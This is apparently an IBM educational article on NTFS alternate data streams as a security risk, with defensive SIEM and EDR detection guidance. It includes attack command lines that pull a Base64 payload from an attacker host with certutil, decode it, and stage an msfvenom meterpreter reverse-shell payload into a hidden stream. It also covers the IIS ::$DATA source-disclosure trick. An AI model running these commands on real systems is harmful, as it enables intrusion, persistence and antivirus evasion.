About cookies on this site Our websites require some cookies to function properly (required). In addition, other cookies may be used with your consent to analyze site usage, improve the user experience and for advertising. For more information, please review your options. By visiting our website, you agree to our processing of information as described in IBM’sprivacy statement. To provide a smooth navigation, your cookie preferences will be shared across the IBM web domains listed here.
Article
Alternate data streams and cybersecurity vulnerabilities
Understand how attackers can use ADS to attack your files or systems
On this page
Alternate data streams (ADS) are a little-known but potent feature of the NTFS file system that enable data to be hidden within files—without altering their visible size or content. Originally designed to support metadata and enhance cross-platform compatibility, ADS now presents a unique security challenge. While legitimate in purpose, these hidden streams can be misused by attackers to conceal malicious payloads or siphon off sensitive information, often slipping past traditional detection tools. This stealthy behavior makes ADS a quiet but formidable threat to system security and data integrity.
Anyone who's responsible for protecting enterprise systems and data needs to understand the security implications of ADS. This guide shines a light on how ADS works, explores the unique risks it presents, and delivers practical guidance on how to identify, investigate, and defend against threats that leverage this feature, equipping you to spot hidden vulnerabilities and strengthen your overall security framework.
Key ADS characteristics
Following are some of the key features of ADS:
- ADS are invisible to most file browsers and traditional file size checks.
- NTFS only supports ADS; files stored on FAT32 or exFAT drives won't retain the streams.
- Some antivirus tools now scan ADS, but many still overlook or ignore them unless configured otherwise.
Manage and detect files with ADS
Accessing the :$DATA ADS
In NTFS, every file has a default data stream called :$DATA. You can access this stream directly using the start command in the Command Prompt:
C:\> start c:\notepad.txt::$DATA
Detecting an ADS
You can detect the presence of ADS using the dir /r command, which lists alternate streams attached to files:
C:\> dir /r C:\windows\system32\calc.exe
If calc.exe has any ADS, the output will look similar to the following image:
Creating an ADS
You can create a new alternate data stream by redirecting or copying content into it. Here's an example of embedding Notepad into a hidden stream attached to another file (in this case, calc.exe):
C:\> type C:\windows\system32\notepad.exe >C:\windows\system32\calc.exe:notepad.txt
This command writes the binary content of notepad.exe into a hidden stream,notepad.txt, attached to calc.exe.
Deleting an ADS
An ADS cannot be deleted using the del command directly, but you can overwrite it with nothing; that is, empty content:
C:\> echo. > C:\windows\system32\calc.exe:notepad.txt
Alternatively, you can use PowerShell to remove an ADS:
Remove -Item -Path .\calc.exe -Stream notepad.txt
Consequences of ADS-based attacks
Following are some major cybersecurity risks to organizations due to NTFS ADS:
- Increased malware persistence: Malware hidden in an ADS can remain undetected for extended periods, allowing attackers more time to infiltrate, escalate privileges, and exfiltrate data.
- Data exfiltration and breaches: Sensitive data can be concealed in an ADS, bypassing traditional security controls and leading to potential data breaches and compliance violations (for example, GDPR or HIPAA).
- Evading detection and forensics: ADS allows attackers to bypass antivirus, EDR systems, and file integrity monitoring, making it harder for security teams to detect and respond to attacks.
- Increased incident response complexity: Traditional monitoring tools may miss a hidden ADS, leading to slower and less effective incident response efforts, complicating the investigation process.
- Insider threat risks: Employees with legitimate access can misuse an ADS to hide unauthorized files or data, bypassing data loss prevention systems and creating internal security risks.
IIS and ADS exploitation
A notable example of a real-world exploitation occurred in older versions of Microsoft Internet Information Services (IIS). IIS used file extensions to determine how to handle a request—specifically, files with the .asp extension were sent to the ASP engine, which executed the server-side code and returned the resulting HTML to the client.
However, due to a flaw in how older versions parsed file extensions, a file named filename.asp::$DATA wasn't recognized as having a valid .asp extension. Instead, IIS interpreted the extension as asp::$DATA, for which no application was registered. As a result, instead of executing the code, IIS simply returned the raw ASP source code to the requester.
Example: Exploiting Vulnerability:
hxxp://www.alternate-data-streams.com/default.asp
hxxp://www.alternate-data-streams.com/default.asp::$DATA
Addressing NTFS ADS in modern cybersecurity
While ADS itself is not new (having been part of NTFS since Windows NT), its potential for malicious exploitation has become more significant in recent years. Cybercriminals are increasingly using ADS to hide malicious payloads, tools, or data in a way that bypasses traditional detection methods. It is being actively exploited in:
- Fileless malware attacks: These types of attacks leverage ADS to stay hidden in plain sight. The malware is not stored as a standalone file but within the ADS, making it harder for conventional antivirus or endpoint protection tools to detect.
- Data exfiltration: Attackers use ADS to hide stolen data or encrypted communication, making it difficult for security systems to flag or prevent data leakage.
- Persistence mechanisms: Malicious actors store backdoors, exploits, or other tools within ADS to maintain access to compromised systems without leaving a visible trace.
- Fileless malware: An attack that runs in memory without leaving traditional file footprints on the system. Because ADS allows data to be embedded in a file without altering the file’s visible content or size, it becomes an ideal method for storing and executing fileless attacks.
Bypassing antivirus software using ADS
The following sections describe methods that malicious actors use to bypass antivirus software:
Using certutil.exe with ADS to evade detection
Included with Windows as part of Certificate Services, certutil.exe is a command-line utility . It's primarily used for managing certificates, displaying CA configuration, and verifying certificate chains. However, attackers have repurposed certutil.exe for malicious purposes, particularly for downloading and hiding malware using ADS.
Malicious use of certutil.exe for file download
A commonly abused feature is the ability to download files from the internet using the following syntax:
certutil.exe -urlcache -split -f [URL] [output_file]
-urlcache: Downloads and caches the URL content-split: Splits the output, if necessary (for example, for encoded files)
Although this command downloads the file in plain form, network security tools can flag the file as malicious. To evade detection, attackers first Base64-encode the file, download it as text, and then decode it locally:
C:\Temp> certutil.exe -urlcache -split -f "hxxps://attacker.site/badcontent.txt" bad.txt
C:\Temp> certutil.exe -decode bad.txt bad.exe
This makes the payload appear as harmless text to edge devices.
ADS and malware staging using certutil.exe
Malicious actors can also use certutil.exe to embed payloads into ADS, which are often overlooked by antivirus tools. For example, using Metasploit, you can write the payload to the ADS of bad.txt, effectively hiding it from traditional detection tools:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=443 -f exe > bad.exe
certutil.exe -urlcache -split -f <http://192.168.1.10/bad.exe> bad.txt:bad.exe
Detection mechanism for SIEM and EDR
SIEM (Security Information and Event Management) and EDR (Endpoint Detection and Response) are both essential components of any robust cybersecurity platform.
Behavior-based detection by EDR tools
EDR solutions can flag suspicious use of certutil.exe based on behavioral patterns mapped to MITRE ATT&CK techniques:
- T1105 – Remote File Copy: Abuse of
certutil -urlcacheto download payloads from external sources. - T1055 – Process Injection: Common in post-download stages for defense evasion after staging payloads.
- T1064 – Scripting for Reverse Shell Execution: Use of PowerShell or batch scripts to decode and execute malicious binaries.
Use case: Detection using SIEM
You can use SIEM to monitor and alert on the execution of certutil.exe with the following arguments:
-urlcache: Indicates potential remote file download
-split: Often used to evade network inspection-encode,-decode,-decodehex: Suggests file obfuscation or transformation
-dump: Used to extract certificate or file content, possibly for staging
Recommended SIEM query filters
- Process name:
certutil.exe - Command line contains any of:
-urlcache-decode-encode-decodehex-split-dump
Summary
You should now have a clearer understanding of alternate data streams. This article has presented details on:
- The concept and functionality of ADS within the NTFS file system
- How threat actors leverage ADS for concealment, persistence, and evading detection
- Techniques for identifying and mitigating ADS-based threats using native Windows commands, PowerShell, endpoint detection tools, and SIEM solutions
- Real-world exploitation scenarios, including the misuse of trusted tools like
certutil.exeto weaponize ADS and circumvent security defenses
By understanding ADS, you are better able to identify and mitigate against the stealthy threats that bypass traditional detection layers. As threat actors continue to evolve, so must your methods of visibility and defense.
Next steps
Explore the following resources to deepen your understanding of ADS and enhance your ability to detect and defend against hidden threats: